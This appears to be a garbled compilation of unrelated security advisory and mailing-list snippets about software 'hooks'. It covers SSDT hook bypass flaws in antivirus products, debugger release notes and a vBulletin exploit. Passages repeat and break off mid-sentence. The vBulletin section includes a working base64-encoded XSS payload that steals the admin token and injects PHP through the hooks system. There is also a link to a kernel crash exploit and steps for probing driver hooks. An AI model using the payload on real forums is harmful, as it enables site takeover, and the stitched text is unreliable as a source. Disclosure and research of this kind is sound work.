hooks
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Insufficient argument validation of hooked SSDT functions
on multiple Antivirus and Firewalls
*Advisory Information*
We have found number of vulnerabilities in implementations of kernel hooks in many different security products.
The argument-switch attack (or KHOBE attack) affects user mode and kernel mode hooks that are used to implement security features. The hook
may be vulnerable if it performs security checks on pointer or handle arguments that come from user mode. Using multiple threads the
attacker is able to change the meaning of the arguments in the middle of the hooked system call and thus bypass the security checks
implemented by the hook. The common implementations of kernel mode hooks, especially so called SSDT hooks, are vulnerable to argument-switch
attack. No product that we investigated during our research did not implemented the hooks correctly.
Vulnerable software:
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).
If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).
If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:
Now to address the quote "potential for exposure and damage is limited".
Clearly Jelsoft have never seen what one can do with an XSS. In this case
you have an unlimited and unaltered XSS space, so you're free to invoke some
AJAX and have fun. Just to give ideas on how this could turn into something
larger, vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:
data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K
What's uhooker?:
A tool to intercept and manipulate execution of programs. It enables
the user to insert hooks in function calls and arbitrary addresses
within the executable file in memory. The hooks handlers are written
in Python and can be changed at runtime without the need to restart
the inspected process.
Download:
http://oss.coresecurity.com/repo/SDTCleaner-v1.0.zip
What is the SDT Cleaner?
SDT Cleaner is a tool that intends to clean the SSDT (system service
descriptor table) from hooks.
* The SDT Cleaner allows you to clean hooks installed by Anti-Virus
and Firewalls.
* This little tool (in this first release) tries to collect info
from your current kernel and then switches to kernel land and if there
Immunity team is proud to present: Immunity Debugger 1.5
This new Immunity Debugger release provides a lot of new scripts and
important fixes. New scripts to improve your debugging experience
include: gflags, hookssl, and hookndr.
The API has been reinforced with new functionality which allows you to
gather more information from the remote process, such as Threads,
findRetValue. This release also includes some important fixes such as
correct Memory Page protection flags, which are also available via the
module.
o immlib.ps() returns two extra objects: the tcp list and the
udp list
o immlib.getComment() now will try to fetch all types of
comments
o Added new HOOKTYPE: PRE_BP_HOOK, hooks exactly before the
breakpoint
is hit (Decoding events timeline)
o New Vista support for libheap
o Custom Tables has "Clear Window" menu now
o Added several methods from librecognize
Hello,
We have found number of vulnerabilities in implementations of SSDT hooks in many different products.
Vulnerable software:
* BlackICE PC Protection 3.6.cqn
* G DATA InternetSecurity 2007
* Ghost Security Suite beta 1.110 and alpha 1.200
Immunity team is proud to present: Immunity Debugger 1.5
This new Immunity Debugger release provides a lot of new scripts and
important fixes. New scripts to improve your debugging experience
include: gflags, hookssl, and hookndr.
The API has been reinforced with new functionality which allows you to
gather more information from the remote process, such as Threads,
findRetValue. This release also includes some important fixes such as
correct Memory Page protection flags, which are also available via the
VULNERABILITIES DESCRIPTION AND TECHNICAL DETAILS:
---------------
SUPERAntiSpyware and Super Ad Blocker have almost identical device
drivers in order to set up hooks and perform other duties from kernel
space. These device drivers suffer from lack of validation of
parameters passed from user mode. Additionally, some of the functions
accessible from user mode are inherently insecure and lead to easy
privilege escalation. All vulnerabilities are applicable to both
applications.
The code injection is possible from an user restricted with minimum privileges
The vulnerability this related with Pro-active Defense, specifically
in the event of Sub-control of Windows, which controls the
installation of hooks among applications; this for defect comes
disabled when installing the antivirus allowing this breach of
security, because it is not verified on the part of the protection.
The vulnerability can be mitigated activating the event of Sub-control
of Windows.
In addition to these security fixes, other fixes have been included
such as:
- Fix crash on netfilter when nfnetlink_log is used on certain
hooks on packets forwarded to or from a bridge
- Fixed busy sleep on IPVS which caused high load averages
- Fixed possible race condition on ext[34]_link
- Fixed missing braces in condition block that led to wrong behaviour
in NFS
- Fixed XFS lock deallocation that resulted in oops when unmounting
// administrator.
//
// To uninstall, run "regsvr32 /u iebsfix1.dll".
//
// The DLL self-registers as a Browser Helper Object, but it
// doesn't actually do anything BHO-like -- it just hooks
// MSHTML.DLL during DllGetClassObject, then "fails." Being a
// BHO is a convenient way to get loaded into Internet Explorer.
// (Note that it may also load into Explorer.) If it can't
// hook the system's MSHTML.DLL, it will display a message box
// informing the user of the failure.
BSOD or hard system hang due to race condition in win32k. sys code that processes UnhookWindowsHookEx. Reproduced when thread calls many times UnhookWindowsHookEx in the same time with switching active windows desktop object (SwitchDesktop) from desktop where hooks are unhooked and broadcasting windows messages to windows on that desktop. Sample exploit code can be downloaded from: http://killprog.com/whk.zip Works on Win'2k3 and Vista. XP seems to be immune to this.
o Full debugger and GUI API access
o A flurry of cool example scripts such as:
- !heap A fully working heap dumping script (try the -d option!)
- !searchheap Searching the heap
- !hippie Trampoline hooks on RtlAllocateheap/RtlFreeHeap
- !modptr Dynamic search for function pointers in pages
- !findantidep Find address to bypass software DEP
o Writing your own scripts for your specific tasks is easy :)
Respect.
What's the best way to actually test this when you don't have the HW you ask ?
Dynamips [9] is the answer.
As long as the rootkit isn't too advanced and e.g. also hooks the write/copy
functions (e.g. an attacker could store the image diff on the system and play
a "proper" memory dump or proper IOS back when you write core/copy to TFTP) then
FX's CIR[7] is the forensics tool of choice. On platforms where the IOS image
is stored on an external flash card forensics may be easier.
mitigating the severity, as unlimited
attack space can be obtained as shown above.
As per my last exploits, all XSS in the vBulletin ACP can be used for
PHP injection instantly. This
is due to the design of the vBulletin hooks feature. As this
particular XSS is persistent and will
render in all major browsers it is particularly dangerous.
=======================================================================
- - Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
- - Login as unprivileged user.
- - Run "dc2 /hct /a".
- - Get BSODHook.exe from Matousec [3].
- - Click on "Load Driver" then click on "Find SSDT hooks" then "Add to
probe list" and then "GO".
*Report Timeline*
o Full debugger and GUI API access
o A flurry of cool example scripts such as:
- !heap A fully working heap dumping script (try the -d option!)
- !searchheap Searching the heap
- !hippie Trampoline hooks on RtlAllocateheap/RtlFreeHeap
- !modptr Dynamic search for function pointers in pages
- !findantidep Find address to bypass software DEP
o Writing your own scripts for your specific tasks is easy :)
|
